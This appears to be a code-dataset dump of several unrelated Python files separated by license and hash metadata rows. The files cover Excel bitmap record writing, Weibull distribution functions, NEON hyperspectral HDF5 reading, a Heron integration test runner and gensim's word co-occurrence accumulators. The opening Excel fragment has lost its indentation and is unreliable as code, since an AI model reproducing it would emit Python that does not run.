# Subtract the underlying cell widths to find the end cell of the image
while (width >= _size_col(sheet, col_end)):
width -= _size_col(sheet, col_end)
col_end += 1
# Subtract the underlying cell heights to find the end cell of the image
while (height >= _size_row(sheet, row_end)):
height -= _size_row(sheet, row_end)
row_end += 1
# Bitmap isn't allowed to start or finish in a hidden cell, i.e. a cell
# with zero height or width.
if ((_size_col(sheet, col_start) == 0) or (_size_col(sheet, col_end) == 0)
or (_size_row(sheet, row_start) == 0) or (_size_row(sheet, row_end) == 0)):
return
# Convert the pixel values to the percentage value expected by Excel
x1 = int(float(x1) / _size_col(sheet, col_start) * 1024)
y1 = int(float(y1) / _size_row(sheet, row_start) * 256)
# Distance to right side of object
x2 = int(float(width) / _size_col(sheet, col_end) * 1024)
# Distance to bottom of object
y2 = int(float(height) / _size_row(sheet, row_end) * 256)
return (col_start, x1, row_start, y1, col_end, x2, row_end, y2)
class ObjBmpRecord(BiffRecord):
_REC_ID = 0x005D # Record identifier
def __init__(self, row, col, sheet, im_data_bmp, x, y, scale_x, scale_y):
# Scale the frame of the image.
width = im_data_bmp.width * scale_x
height = im_data_bmp.height * scale_y
# Calculate the vertices of the image and write the OBJ record
coordinates = _position_image(sheet, row, col, x, y, width, height)
# print coordinates
col_start, x1, row_start, y1, col_end, x2, row_end, y2 = coordinates
"""Store the OBJ record that precedes an IMDATA record. This could be generalise
to support other Excel objects.
"""
cObj = 0x0001 # Count of objects in file (set to 1)
OT = 0x0008 # Object type. 8 = Picture
id = 0x0001 # Object ID
grbit = 0x0614 # Option flags
colL = col_start # Col containing upper left corner of object
dxL = x1 # Distance from left side of cell
rwT = row_start # Row containing top left corner of object
dyT = y1 # Distance from top of cell
colR = col_end # Col containing lower right corner of object
dxR = x2 # Distance from right of cell
rwB = row_end # Row containing bottom right corner of object
dyB = y2 # Distance from bottom of cell
cbMacro = 0x0000 # Length of FMLA structure
Reserved1 = 0x0000 # Reserved
Reserved2 = 0x0000 # Reserved
icvBack = 0x09 # Background colour
icvFore = 0x09 # Foreground colour
fls = 0x00 # Fill pattern
fAuto = 0x00 # Automatic fill
icv = 0x08 # Line colour
lns = 0xff # Line style
lnw = 0x01 # Line weight
fAutoB = 0x00 # Automatic border
frs = 0x0000 # Frame style
cf = 0x0009 # Image format, 9 = bitmap
Reserved3 = 0x0000 # Reserved
cbPictFmla = 0x0000 # Length of FMLA structure
Reserved4 = 0x0000 # Reserved
grbit2 = 0x0001 # Option flags
Reserved5 = 0x0000 # Reserved
data = pack("<L", cObj)
data += pack("<H", OT)
data += pack("<H", id)
data += pack("<H", grbit)
data += pack("<H", colL)
data += pack("<H", dxL)
data += pack("<H", rwT)
data += pack("<H", dyT)
data += pack("<H", colR)
data += pack("<H", dxR)
data += pack("<H", rwB)
data += pack("<H", dyB)
data += pack("<H", cbMacro)
data += pack("<L", Reserved1)
data += pack("<H", Reserved2)
data += pack("<B", icvBack)
data += pack("<B", icvFore)
data += pack("<B", fls)
data += pack("<B", fAuto)
data += pack("<B", icv)
data += pack("<B", lns)
data += pack("<B", lnw)
data += pack("<B", fAutoB)
data += pack("<H", frs)
data += pack("<L", cf)
data += pack("<H", Reserved3)
data += pack("<H", cbPictFmla)
data += pack("<H", Reserved4)
data += pack("<H", grbit2)
data += pack("<L", Reserved5)
self._rec_data = data
def _process_bitmap(bitmap):
"""Convert a 24 bit bitmap into the modified internal format used by Windows.
This is described in BITMAPCOREHEADER and BITMAPCOREINFO structures in the
MSDN library.
"""
# Open file and binmode the data in case the platform needs it.
fh = open(bitmap, 'rb')
try:
# Slurp the file into a string.
data = fh.read()
finally:
fh.close()
# Check that the file is big enough to be a bitmap.
if len(data) <= 0x36:
raise Exception("bitmap doesn't contain enough data.")
# The first 2 bytes are used to identify the bitmap.
if (data[:2] != b"BM"):
raise Exception("bitmap doesn't appear to to be a valid bitmap image.")
# Remove bitmap data: ID.
data = data[2:]
# Read and remove the bitmap size. This is more reliable than reading
# the data size at offset 0x22.
#
size = unpack("<L", data[:4])[0]
size -= 0x36 # Subtract size of bitmap header.
size += 0x0C # Add size of BIFF header.
data = data[4:]
# Remove bitmap data: reserved, offset, header length.
data = data[12:]
# Read and remove the bitmap width and height. Verify the sizes.
width, height = unpack("<LL", data[:8])
data = data[8:]
if (width > 0xFFFF):
raise Exception("bitmap: largest image width supported is 65k.")
if (height > 0xFFFF):
raise Exception("bitmap: largest image height supported is 65k.")
# Read and remove the bitmap planes and bpp data. Verify them.
planes, bitcount = unpack("<HH", data[:4])
data = data[4:]
if (bitcount != 24):
raise Exception("bitmap isn't a 24bit true color bitmap.")
if (planes != 1):
raise Exception("bitmap: only 1 plane supported in bitmap image.")
# Read and remove the bitmap compression. Verify compression.
compression = unpack("<L", data[:4])[0]
data = data[4:]
if (compression != 0):
raise Exception("bitmap: compression not supported in bitmap image.")
# Remove bitmap data: data size, hres, vres, colours, imp. colours.
data = data[20:]
# Add the BITMAPCOREHEADER data
header = pack("<LHHHH", 0x000c, width, height, 0x01, 0x18)
data = header + data
return (width, height, size, data)
class ImDataBmpRecord(BiffRecord):
_REC_ID = 0x007F
def __init__(self, filename):
"""Insert a 24bit bitmap image in a worksheet. The main record required is
IMDATA but it must be proceeded by a OBJ record to define its position.
"""
BiffRecord.__init__(self)
self.width, self.height, self.size, data = _process_bitmap(filename)
# Write the IMDATA record to store the bitmap data
cf = 0x09
env = 0x01
lcb = self.size
self._rec_data = pack("<HHL", cf, env, lcb) + data
|
apache-2.0
| 6,240,996,760,064,364,000 | 39.27907 | 88 | 0.570439 | false |
ragulpr/wtte-rnn
|
python/wtte/weibull.py
|
1
|
5548
|
"""
Wrapper for Python Weibull functions
"""
import numpy as np
def cumulative_hazard(t, a, b):
""" Cumulative hazard
:param t: Value
:param a: Alpha
:param b: Beta
:return: `np.power(t / a, b)`
"""
t = np.double(t)
return np.power(t / a, b)
def hazard(t, a, b):
t = np.double(t)
return (b / a) * np.power(t / a, b - 1)
def cdf(t, a, b):
""" Cumulative distribution function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `1 - np.exp(-np.power(t / a, b))`
"""
t = np.double(t)
return 1 - np.exp(-np.power(t / a, b))
def pdf(t, a, b):
""" Probability distribution function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `(b / a) * np.power(t / a, b - 1) * np.exp(-np.power(t / a, b))`
"""
t = np.double(t)
return (b / a) * np.power(t / a, b - 1) * np.exp(-np.power(t / a, b))
def cmf(t, a, b):
""" Cumulative Mass Function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `cdf(t + 1, a, b)`
"""
t = np.double(t) + 1e-35
return cdf(t + 1, a, b)
def pmf(t, a, b):
""" Probability mass function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `cdf(t + 1.0, a, b) - cdf(t, a, b)`
"""
t = np.double(t) + 1e-35
return cdf(t + 1.0, a, b) - cdf(t, a, b)
def mode(a, b):
# Continuous mode.
# TODO (mathematically) prove how close it is to discretized mode
try:
mode = a * np.power((b - 1.0) / b, 1.0 / b)
mode[b <= 1.0] = 0.0
except:
# scalar case
if b <= 1.0:
mode = 0
else:
mode = a * np.power((b - 1.0) / b, 1.0 / b)
return mode
def quantiles(a, b, p):
""" Quantiles
:param a: Alpha
:param b: Beta
    :param p: quantile level in (0, 1)
:return: `a * np.power(-np.log(1.0 - p), 1.0 / b)`
"""
return a * np.power(-np.log(1.0 - p), 1.0 / b)
def mean(a, b):
"""Continuous mean. Theoretically at most 1 step below discretized mean
`E[T ] <= E[Td] + 1` true for positive distributions.
:param a: Alpha
:param b: Beta
:return: `a * gamma(1.0 + 1.0 / b)`
"""
from scipy.special import gamma
return a * gamma(1.0 + 1.0 / b)
def continuous_loglik(t, a, b, u=1, equality=False):
"""Continous censored loglikelihood function.
:param bool equality: In ML we usually only care about the likelihood
with *proportionality*, removing terms not dependent on the parameters.
If this is set to `True` we keep those terms.
"""
if equality:
loglik = u * np.log(pdf(t, a, b)) + (1 - u) * \
np.log(1.0 - cdf(t, a, b))
else:
# commonly optimized over: proportional terms w.r.t alpha,beta
        loglik = u * np.log(hazard(t, a, b)) - \
            cumulative_hazard(t, a, b)
return loglik
def discrete_loglik(t, a, b, u=1, equality=False):
"""Discrete censored loglikelihood function.
:param bool equality: In ML we usually only care about the likelihood
with *proportionality*, removing terms not dependent on the parameters.
If this is set to `True` we keep those terms.
"""
if equality:
# With equality instead of proportionality.
loglik = u * np.log(pmf(t, a, b)) + (1 - u) * \
np.log(1.0 - cdf(t + 1.0, a, b))
else:
# commonly optimized over: proportional terms w.r.t alpha,beta
hazard0 = cumulative_hazard(t, a, b)
hazard1 = cumulative_hazard(t + 1., a, b)
loglik = u * np.log(np.exp(hazard1 - hazard0) - 1.0) - hazard1
return loglik
# Conditional excess
class conditional_excess():
""" Experimental class for conditional excess distribution.
The idea is to query `s` into the future after time `t`
    has passed without event. See the thesis for details.
    note: Not tested and may be incorrect!
"""
    @staticmethod
    def pdf(t, s, a, b):
t = np.double(t)
return hazard(t + s, a, b) * np.exp(-cumulative_hazard(t + s, a, b) + cumulative_hazard(t, a, b))
    @staticmethod
    def cdf(t, s, a, b):
t = np.double(t)
return 1 - np.exp(-cumulative_hazard(t + s, a, b) + cumulative_hazard(t, a, b))
    @staticmethod
    def quantile(t, a, b, p):
# TODO this is not tested yet.
# tests:
# cequantile(0., a, b, p)==quantiles(a, b, p)
# cequantile(t, a, 1., p)==cequantile(0., a, 1., p)
# conditional excess quantile
# t+s : Pr(Y<t+s|y>t)=p
print('not tested')
L = np.power((t + .0) / a, b)
quantile = a * np.power(-np.log(1. - p) - L, 1. / b)
return quantile
    @staticmethod
    def mean(t, a, b):
# TODO this is not tested yet.
# tests:
# cemean(0., a, b)==mean(a, b, p)
# mean(t, a, 1., p)==mean(0., a, 1., p) == a
# conditional excess mean
# E[Y|y>t]
# (conditional mean age at failure)
# http://reliabilityanalyticstoolkit.appspot.com/conditional_distribution
from scipy.special import gamma
from scipy.special import gammainc
# Regularized lower gamma
print('not tested')
v = 1. + 1. / b
gv = gamma(v)
L = np.power((t + .0) / a, b)
cemean = a * gv * np.exp(L) * (1 - gammainc(v, t / a) / gv)
return cemean
|
mit
| 3,363,990,892,926,508,500 | 25.293839 | 105 | 0.541637 | false |
mjones01/NEON-Data-Skills
|
tutorials-in-development/DI-remote-sensing-python/neon_aop_spectral_python_functions_tiled_data/aop_h5refl2array.py
|
1
|
3682
|
def aop_h5refl2array(refl_filename):
"""read in NEON AOP reflectance hdf5 file, convert to a cleaned reflectance
array and return associated metadata (spatial information and band center
wavelengths)
Parameters
----------
refl_filename : string
reflectance hdf5 file name, including full or relative path
Returns
--------
reflArray : ndarray
array of reflectance values
metadata: dictionary
associated metadata containing
bad_band_window1 (tuple)
bad_band_window2 (tuple)
bands: # of bands (float)
data ignore value: value corresponding to no data (float)
epsg: coordinate system code (float)
map info: coordinate system, datum & ellipsoid, pixel dimensions, and origin coordinates (string)
reflectance scale factor: factor by which reflectance is scaled (float)
wavelength: center wavelengths of bands (float)
wavelength unit: 'm' (string)
--------
NOTE: This function applies to the NEON hdf5 format implemented in 2016, and should be used for
data acquired 2016 and after. Data in earlier NEON hdf5 format (collected prior to 2016) is
expected to be re-processed after the 2018 flight season.
--------
Example Execution:
--------
    sercRefl, sercRefl_metadata = aop_h5refl2array('NEON_D02_SERC_DP3_368000_4306000_reflectance.h5') """
    import h5py
    import numpy as np
#Read in reflectance hdf5 file
hdf5_file = h5py.File(refl_filename,'r')
#Get the site name
file_attrs_string = str(list(hdf5_file.items()))
file_attrs_string_split = file_attrs_string.split("'")
sitename = file_attrs_string_split[1]
#Extract the reflectance & wavelength datasets
refl = hdf5_file[sitename]['Reflectance']
reflData = refl['Reflectance_Data']
reflRaw = refl['Reflectance_Data'].value
#Create dictionary containing relevant metadata information
metadata = {}
metadata['map info'] = refl['Metadata']['Coordinate_System']['Map_Info'].value
metadata['wavelength'] = refl['Metadata']['Spectral_Data']['Wavelength'].value
#Extract no data value & scale factor
metadata['data ignore value'] = float(reflData.attrs['Data_Ignore_Value'])
metadata['reflectance scale factor'] = float(reflData.attrs['Scale_Factor'])
#metadata['interleave'] = reflData.attrs['Interleave']
#Apply no data value
reflClean = reflRaw.astype(float)
arr_size = reflClean.shape
if metadata['data ignore value'] in reflRaw:
print('% No Data: ',np.round(np.count_nonzero(reflClean==metadata['data ignore value'])*100/(arr_size[0]*arr_size[1]*arr_size[2]),1))
nodata_ind = np.where(reflClean==metadata['data ignore value'])
reflClean[nodata_ind]=np.nan
#Apply scale factor
reflArray = reflClean/metadata['reflectance scale factor']
#Extract spatial extent from attributes
metadata['spatial extent'] = reflData.attrs['Spatial_Extent_meters']
#Extract bad band windows
metadata['bad band window1'] = (refl.attrs['Band_Window_1_Nanometers'])
metadata['bad band window2'] = (refl.attrs['Band_Window_2_Nanometers'])
#Extract projection information
#metadata['projection'] = refl['Metadata']['Coordinate_System']['Proj4'].value
metadata['epsg'] = int(refl['Metadata']['Coordinate_System']['EPSG Code'].value)
#Extract map information: spatial extent & resolution (pixel size)
mapInfo = refl['Metadata']['Coordinate_System']['Map_Info'].value
    hdf5_file.close()
return reflArray, metadata
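# A brief usage sketch (illustrative only; the file name pattern comes from
# the docstring above and the band index is arbitrary):
def demo_read_band(refl_filename, band_index=55):
    """Read a reflectance tile and return one band as a 2D array together
    with its center wavelength."""
    reflArray, metadata = aop_h5refl2array(refl_filename)
    return reflArray[:, :, band_index], metadata['wavelength'][band_index]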
|
agpl-3.0
| -3,099,062,738,407,099,000 | 40.852273 | 141 | 0.660511 | false |
twitter/heron
|
integration_test/src/python/local_test_runner/main.py
|
2
|
5882
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" main.py """
import getpass
import json
import logging
import os
import pkgutil
import time
import socket
import subprocess
import sys
from collections import namedtuple
from ..common import status
from heron.common.src.python.utils import log
# import test_kill_bolt
from . import test_kill_metricsmgr
from . import test_kill_stmgr
from . import test_kill_stmgr_metricsmgr
from . import test_kill_tmanager
from . import test_scale_up
from . import test_template
from . import test_explorer
TEST_CLASSES = [
test_template.TestTemplate,
test_kill_tmanager.TestKillTManager,
test_kill_stmgr.TestKillStmgr,
test_kill_metricsmgr.TestKillMetricsMgr,
test_kill_stmgr_metricsmgr.TestKillStmgrMetricsMgr,
test_scale_up.TestScaleUp,
# test_kill_bolt.TestKillBolt,
test_explorer.TestExplorer,
]
# The location of default configure file
DEFAULT_TEST_CONF_FILE = "integration_test/src/python/local_test_runner/resources/test.conf"
ProcessTuple = namedtuple('ProcessTuple', 'pid cmd')
def run_tests(test_classes, args):
""" Run the test for each topology specified in the conf file """
successes = []
failures = []
tracker_process = _start_tracker(args['trackerPath'], args['trackerPort'])
try:
for test_class in test_classes:
testname = test_class.__name__
logging.info("==== Starting test %s of %s: %s ====",
len(successes) + len(failures) + 1, len(test_classes), testname)
template = test_class(testname, args)
try:
result = template.run_test()
if isinstance(result, status.TestSuccess): # testcase passed
successes += [testname]
elif isinstance(result, status.TestFailure):
failures += [testname]
else:
logging.error(
"Unrecognized test response returned for test %s: %s", testname, str(result))
failures += [testname]
except status.TestFailure:
failures += [testname]
except Exception as e:
logging.error("Exception thrown while running tests: %s", str(e), exc_info=True)
finally:
tracker_process.kill()
return successes, failures
def _start_tracker(tracker_path, tracker_port):
splitcmd = [tracker_path, '--verbose', '--port=%s' % tracker_port]
logging.info("Starting heron tracker: %s", splitcmd)
popen = subprocess.Popen(splitcmd)
logging.info("Successfully started heron tracker on port %s", tracker_port)
return popen
def _random_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def main():
""" main """
log.configure(level=logging.DEBUG)
# Read the configuration file from package
conf_file = DEFAULT_TEST_CONF_FILE
conf_string = pkgutil.get_data(__name__, conf_file).decode()
decoder = json.JSONDecoder(strict=False)
# Convert the conf file to a json format
conf = decoder.decode(conf_string)
args = dict()
home_directory = os.path.expanduser("~")
args['cluster'] = conf['cluster']
args['topologyName'] = conf['topology']['topologyName']
args['topologyClassPath'] = conf['topology']['topologyClassPath']
args['workingDirectory'] = os.path.join(
home_directory,
".herondata",
"topologies",
conf['cluster'],
getpass.getuser(),
args['topologyName']
)
args['cliPath'] = os.path.expanduser(conf['heronCliPath'])
args['trackerPath'] = os.path.expanduser(conf['heronTrackerPath'])
args['trackerPort'] = _random_port()
args['outputFile'] = os.path.join(args['workingDirectory'], conf['topology']['outputFile'])
args['readFile'] = os.path.join(args['workingDirectory'], conf['topology']['readFile'])
args['testJarPath'] = conf['testJarPath']
test_classes = TEST_CLASSES
if len(sys.argv) > 1:
first_arg = sys.argv[1]
class_tokens = first_arg.split(".")
if first_arg == "-h" or len(class_tokens) < 2:
usage()
import importlib
package_tokens = class_tokens[:-1]
test_class = class_tokens[-1]
if len(package_tokens) == 1: # prepend base packages for convenience
test_module = "integration_test.src.python.local_test_runner." + package_tokens[0]
else:
test_module = '.'.join(package_tokens)
logging.info("test_module %s", test_module)
logging.info("test_class %s", test_class)
test_classes = [getattr(importlib.import_module(test_module), test_class)]
start_time = time.time()
(successes, failures) = run_tests(test_classes, args)
elapsed_time = time.time() - start_time
total = len(failures) + len(successes)
if not failures:
logging.info("Success: %s (all) tests passed", len(successes))
logging.info("Elapsed time: %s", elapsed_time)
sys.exit(0)
else:
logging.error("Fail: %s/%s test failed:", len(failures), total)
for test in failures:
logging.error(" - %s", test)
sys.exit(1)
def usage():
logging.info("Usage: python %s [<test_module>.<testname>]", sys.argv[0])
sys.exit(1)
if __name__ == '__main__':
main()
|
apache-2.0
| -6,514,305,771,824,474,000 | 31.677778 | 93 | 0.683101 | false |
mattilyra/gensim
|
gensim/topic_coherence/text_analysis.py
|
1
|
24297
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""This module contains classes for analyzing the texts of a corpus to accumulate
statistical information about word occurrences."""
import itertools
import logging
import multiprocessing as mp
import sys
from collections import Counter
import numpy as np
import scipy.sparse as sps
from six import iteritems, string_types
from gensim import utils
from gensim.models.word2vec import Word2Vec
logger = logging.getLogger(__name__)
def _ids_to_words(ids, dictionary):
"""Convert an iterable of ids to their corresponding words using a dictionary.
Abstract away the differences between the HashDictionary and the standard one.
Parameters
----------
ids: dict
Dictionary of ids and their words.
dictionary: :class:`~gensim.corpora.dictionary.Dictionary`
Input gensim dictionary
Returns
-------
set
Corresponding words.
Examples
--------
>>> from gensim.corpora.dictionary import Dictionary
>>> from gensim.topic_coherence import text_analysis
>>>
>>> dictionary = Dictionary()
>>> ids = {1: 'fake', 4: 'cats'}
>>> dictionary.id2token = {1: 'fake', 2: 'tokens', 3: 'rabbids', 4: 'cats'}
>>>
>>> text_analysis._ids_to_words(ids, dictionary)
set(['cats', 'fake'])
"""
if not dictionary.id2token: # may not be initialized in the standard gensim.corpora.Dictionary
setattr(dictionary, 'id2token', {v: k for k, v in dictionary.token2id.items()})
top_words = set()
for word_id in ids:
word = dictionary.id2token[word_id]
if isinstance(word, set):
top_words = top_words.union(word)
else:
top_words.add(word)
return top_words
class BaseAnalyzer(object):
"""Base class for corpus and text analyzers.
Attributes
----------
relevant_ids : dict
Mapping
_vocab_size : int
Size of vocabulary.
id2contiguous : dict
Mapping word_id -> number.
log_every : int
Interval for logging.
_num_docs : int
Number of documents.
"""
def __init__(self, relevant_ids):
"""
Parameters
----------
relevant_ids : dict
Mapping
Examples
--------
>>> from gensim.topic_coherence import text_analysis
>>> ids = {1: 'fake', 4: 'cats'}
>>> base = text_analysis.BaseAnalyzer(ids)
>>> # should return {1: 'fake', 4: 'cats'} 2 {1: 0, 4: 1} 1000 0
>>> print base.relevant_ids, base._vocab_size, base.id2contiguous, base.log_every, base._num_docs
{1: 'fake', 4: 'cats'} 2 {1: 0, 4: 1} 1000 0
"""
self.relevant_ids = relevant_ids
self._vocab_size = len(self.relevant_ids)
self.id2contiguous = {word_id: n for n, word_id in enumerate(self.relevant_ids)}
self.log_every = 1000
self._num_docs = 0
@property
def num_docs(self):
return self._num_docs
@num_docs.setter
def num_docs(self, num):
self._num_docs = num
if self._num_docs % self.log_every == 0:
logger.info(
"%s accumulated stats from %d documents",
self.__class__.__name__, self._num_docs)
def analyze_text(self, text, doc_num=None):
raise NotImplementedError("Base classes should implement analyze_text.")
def __getitem__(self, word_or_words):
if isinstance(word_or_words, string_types) or not hasattr(word_or_words, '__iter__'):
return self.get_occurrences(word_or_words)
else:
return self.get_co_occurrences(*word_or_words)
def get_occurrences(self, word_id):
"""Return number of docs the word occurs in, once `accumulate` has been called."""
return self._get_occurrences(self.id2contiguous[word_id])
def _get_occurrences(self, word_id):
raise NotImplementedError("Base classes should implement occurrences")
def get_co_occurrences(self, word_id1, word_id2):
"""Return number of docs the words co-occur in, once `accumulate` has been called."""
return self._get_co_occurrences(self.id2contiguous[word_id1], self.id2contiguous[word_id2])
def _get_co_occurrences(self, word_id1, word_id2):
raise NotImplementedError("Base classes should implement co_occurrences")
class UsesDictionary(BaseAnalyzer):
"""A BaseAnalyzer that uses a Dictionary, hence can translate tokens to counts.
The standard BaseAnalyzer can only deal with token ids since it doesn't have the token2id
mapping.
Attributes
----------
relevant_words : set
Set of words that occurrences should be accumulated for.
dictionary : :class:`~gensim.corpora.dictionary.Dictionary`
Dictionary based on text
token2id : dict
Mapping from :class:`~gensim.corpora.dictionary.Dictionary`
"""
def __init__(self, relevant_ids, dictionary):
"""
Parameters
----------
relevant_ids : dict
Mapping
dictionary : :class:`~gensim.corpora.dictionary.Dictionary`
Dictionary based on text
Examples
--------
>>> from gensim.topic_coherence import text_analysis
>>> from gensim.corpora.dictionary import Dictionary
>>>
>>> ids = {1: 'foo', 2: 'bar'}
>>> dictionary = Dictionary([['foo','bar','baz'], ['foo','bar','bar','baz']])
>>> udict = text_analysis.UsesDictionary(ids, dictionary)
>>>
>>> print udict.relevant_words
set([u'foo', u'baz'])
"""
super(UsesDictionary, self).__init__(relevant_ids)
self.relevant_words = _ids_to_words(self.relevant_ids, dictionary)
self.dictionary = dictionary
self.token2id = dictionary.token2id
def get_occurrences(self, word):
"""Return number of docs the word occurs in, once `accumulate` has been called."""
try:
word_id = self.token2id[word]
except KeyError:
word_id = word
return self._get_occurrences(self.id2contiguous[word_id])
def _word2_contiguous_id(self, word):
try:
word_id = self.token2id[word]
except KeyError:
word_id = word
return self.id2contiguous[word_id]
def get_co_occurrences(self, word1, word2):
"""Return number of docs the words co-occur in, once `accumulate` has been called."""
word_id1 = self._word2_contiguous_id(word1)
word_id2 = self._word2_contiguous_id(word2)
return self._get_co_occurrences(word_id1, word_id2)
class InvertedIndexBased(BaseAnalyzer):
"""Analyzer that builds up an inverted index to accumulate stats."""
def __init__(self, *args):
"""
Parameters
----------
args : dict
Look at :class:`~gensim.topic_coherence.text_analysis.BaseAnalyzer`
Examples
--------
>>> from gensim.topic_coherence import text_analysis
>>>
>>> ids = {1: 'fake', 4: 'cats'}
>>> ininb = text_analysis.InvertedIndexBased(ids)
>>>
>>> print ininb._inverted_index
[set([]) set([])]
"""
super(InvertedIndexBased, self).__init__(*args)
self._inverted_index = np.array([set() for _ in range(self._vocab_size)])
def _get_occurrences(self, word_id):
return len(self._inverted_index[word_id])
def _get_co_occurrences(self, word_id1, word_id2):
s1 = self._inverted_index[word_id1]
s2 = self._inverted_index[word_id2]
return len(s1.intersection(s2))
def index_to_dict(self):
contiguous2id = {n: word_id for word_id, n in iteritems(self.id2contiguous)}
return {contiguous2id[n]: doc_id_set for n, doc_id_set in enumerate(self._inverted_index)}
class CorpusAccumulator(InvertedIndexBased):
"""Gather word occurrence stats from a corpus by iterating over its BoW representation."""
def analyze_text(self, text, doc_num=None):
"""Build an inverted index from a sequence of corpus texts."""
doc_words = frozenset(x[0] for x in text)
top_ids_in_doc = self.relevant_ids.intersection(doc_words)
for word_id in top_ids_in_doc:
self._inverted_index[self.id2contiguous[word_id]].add(self._num_docs)
def accumulate(self, corpus):
for document in corpus:
self.analyze_text(document)
self.num_docs += 1
return self
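# A tiny usage sketch (illustrative only, not part of gensim): document
# frequencies and co-document frequencies for token ids 1 and 4 over a
# made-up BoW corpus.
def _demo_corpus_accumulator():
    corpus = [[(1, 2), (4, 1)], [(1, 1)], [(4, 3)]]
    accumulator = CorpusAccumulator({1, 4}).accumulate(corpus)
    # token 1 appears in two documents; tokens 1 and 4 share one document
    return accumulator.get_occurrences(1), accumulator.get_co_occurrences(1, 4)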
class WindowedTextsAnalyzer(UsesDictionary):
"""Gather some stats about relevant terms of a corpus by iterating over windows of texts."""
def __init__(self, relevant_ids, dictionary):
"""
Parameters
----------
relevant_ids : set of int
Relevant id
dictionary : :class:`~gensim.corpora.dictionary.Dictionary`
Dictionary instance with mappings for the relevant_ids.
"""
super(WindowedTextsAnalyzer, self).__init__(relevant_ids, dictionary)
self._none_token = self._vocab_size # see _iter_texts for use of none token
def accumulate(self, texts, window_size):
relevant_texts = self._iter_texts(texts)
windows = utils.iter_windows(
relevant_texts, window_size, ignore_below_size=False, include_doc_num=True)
for doc_num, virtual_document in windows:
self.analyze_text(virtual_document, doc_num)
self.num_docs += 1
return self
def _iter_texts(self, texts):
dtype = np.uint16 if np.iinfo(np.uint16).max >= self._vocab_size else np.uint32
for text in texts:
if self.text_is_relevant(text):
yield np.array([
self.id2contiguous[self.token2id[w]] if w in self.relevant_words
else self._none_token
for w in text], dtype=dtype)
def text_is_relevant(self, text):
"""Check if the text has any relevant words."""
for word in text:
if word in self.relevant_words:
return True
return False
class InvertedIndexAccumulator(WindowedTextsAnalyzer, InvertedIndexBased):
"""Build an inverted index from a sequence of corpus texts."""
def analyze_text(self, window, doc_num=None):
for word_id in window:
if word_id is not self._none_token:
self._inverted_index[word_id].add(self._num_docs)
class WordOccurrenceAccumulator(WindowedTextsAnalyzer):
"""Accumulate word occurrences and co-occurrences from a sequence of corpus texts."""
def __init__(self, *args):
super(WordOccurrenceAccumulator, self).__init__(*args)
self._occurrences = np.zeros(self._vocab_size, dtype='uint32')
self._co_occurrences = sps.lil_matrix((self._vocab_size, self._vocab_size), dtype='uint32')
self._uniq_words = np.zeros((self._vocab_size + 1,), dtype=bool) # add 1 for none token
self._counter = Counter()
def __str__(self):
return self.__class__.__name__
def accumulate(self, texts, window_size):
self._co_occurrences = self._co_occurrences.tolil()
self.partial_accumulate(texts, window_size)
self._symmetrize()
return self
def partial_accumulate(self, texts, window_size):
"""Meant to be called several times to accumulate partial results.
Notes
-----
The final accumulation should be performed with the `accumulate` method as opposed to this one.
This method does not ensure the co-occurrence matrix is in lil format and does not
symmetrize it after accumulation.
"""
self._current_doc_num = -1
self._token_at_edge = None
self._counter.clear()
super(WordOccurrenceAccumulator, self).accumulate(texts, window_size)
for combo, count in iteritems(self._counter):
self._co_occurrences[combo] += count
return self
def analyze_text(self, window, doc_num=None):
self._slide_window(window, doc_num)
mask = self._uniq_words[:-1] # to exclude none token
if mask.any():
self._occurrences[mask] += 1
self._counter.update(itertools.combinations(np.nonzero(mask)[0], 2))
def _slide_window(self, window, doc_num):
if doc_num != self._current_doc_num:
self._uniq_words[:] = False
self._uniq_words[np.unique(window)] = True
self._current_doc_num = doc_num
else:
self._uniq_words[self._token_at_edge] = False
self._uniq_words[window[-1]] = True
self._token_at_edge = window[0]
def _symmetrize(self):
"""Word pairs may have been encountered in (i, j) and (j, i) order.
Notes
-----
Rather than enforcing a particular ordering during the update process,
we choose to symmetrize the co-occurrence matrix after accumulation has completed.
"""
co_occ = self._co_occurrences
co_occ.setdiag(self._occurrences) # diagonal should be equal to occurrence counts
self._co_occurrences = \
co_occ + co_occ.T - sps.diags(co_occ.diagonal(), offsets=0, dtype='uint32')
def _get_occurrences(self, word_id):
return self._occurrences[word_id]
def _get_co_occurrences(self, word_id1, word_id2):
return self._co_occurrences[word_id1, word_id2]
def merge(self, other):
self._occurrences += other._occurrences
self._co_occurrences += other._co_occurrences
self._num_docs += other._num_docs
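# A short usage sketch (illustrative only, not part of gensim): count
# sliding-window co-occurrences of 'human' and 'computer' in a toy corpus.
def _demo_word_occurrence_accumulator():
    from gensim.corpora.dictionary import Dictionary
    texts = [['human', 'interface', 'computer'], ['survey', 'computer', 'system']]
    dictionary = Dictionary(texts)
    relevant_ids = {dictionary.token2id['human'], dictionary.token2id['computer']}
    accumulator = WordOccurrenceAccumulator(relevant_ids, dictionary)
    accumulator.accumulate(texts, window_size=3)
    return accumulator.get_co_occurrences('human', 'computer')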
class PatchedWordOccurrenceAccumulator(WordOccurrenceAccumulator):
"""Monkey patched for multiprocessing worker usage, to move some of the logic to the master process."""
def _iter_texts(self, texts):
return texts # master process will handle this
class ParallelWordOccurrenceAccumulator(WindowedTextsAnalyzer):
"""Accumulate word occurrences in parallel.
Attributes
----------
processes : int
Number of processes to use; must be at least two.
args :
Should include `relevant_ids` and `dictionary` (see :class:`~UsesDictionary.__init__`).
kwargs :
Can include `batch_size`, which is the number of docs to send to a worker at a time.
If not included, it defaults to 64.
"""
def __init__(self, processes, *args, **kwargs):
